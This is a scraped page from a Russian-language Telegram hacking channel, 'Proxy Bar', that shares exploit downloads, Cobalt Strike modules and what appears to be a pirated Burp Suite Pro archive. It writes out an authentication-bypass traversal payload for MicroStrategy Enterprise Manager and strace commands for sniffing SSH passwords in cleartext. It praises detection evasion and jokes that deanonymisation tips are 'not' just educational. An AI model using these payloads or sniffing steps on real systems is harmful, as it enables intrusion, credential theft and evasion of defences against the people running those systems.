Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Microsoft Exchange ProxyNotShell RCE
Не POC, а полноценный официальный exploit для metasploit
download

#rce #exploit #microsoft #metasploit
👍12🔥4
The Linux Kernel Module Programming Guide
November 10, 2022
read
🔥4👍2
WindowSpy
Это такой Cobalt Strike Beacon который "узконаправленно" следит за действиями пользователя (открытие определенных документов, вкладки браузера, vpn коннекты и тд).
Такая движуха повышает скрытность и снижает обнаружение. Значит - маст хэв.

download

#cobaltstrike #module
👍8🔥4
Recon Methods
*
part 1 - OSINT Host Discovery
part 2 - OSINT Host Discovery Continued
part 3 - OSINT Employee Discovery
part 4 - Automated OSINT
part 5 - Traffic on the Target

#cybersec #recon
👍9
Black Hat 2022 USA/ASIA/Europe
видео
USA
ASIA
EUROPE
👍13🔥2
The Defender’s Guide to the Windows Registry
read

#widows #defender #registry
👍5😱1
концепция удаления/записи произвольного файла в Sysmon (CVE-2022-41120/CVE-2022-XXXXX)
download POC

#windows #LPE #poc
😱4👍2🔥2
Bug Bounty Wordlists
download
👍16🔥3
Linux PrivEsc
Злой CRON для самых маленьких - тут

#linux #cron #esc
👍4🔥1😱1
😱5🔥3
Random C2 Profile Generator
для cobalt-strike
download

#cobalt
👍8
Pentagrid
SMS-шлюз
с открытым исходным кодом для пентест проектов
read
install and run

#gsm #gateway #sms #2G/3G/4G/5G
🔥8👍7
burpsuite_pro_v2022.12.zip
566.6 MB
Burp Suite PRO version 2022.12.2
👍9😱5🔥2
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass
read
👍2🔥2
CVE-2022-29596
MicroStrategy Enterprise Manager 2022
обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:

Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login

#microsoft #bypass
🔥5
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture


#ssh #sniff #password
😱16👍9🔥3
CVE-2022-2414-POC.zip
1.2 KB
CVE-2022-2414
Дырка в pki-core
уязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы.
👍4🔥1
Defender Exclusions BOF
Хороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))
0_щ
👍7🔥2
Ну во первых с пятницей.
А во вторых, Я тебя сука по IP вычислю
*
только для образовательных целей (нет)

#track #ip #deanon
👍6😱6
DCOMPotato
Коллекция эксплойтов /повышения привилегий службы DCOM.
*
doownload

#exploit #dcom
👍5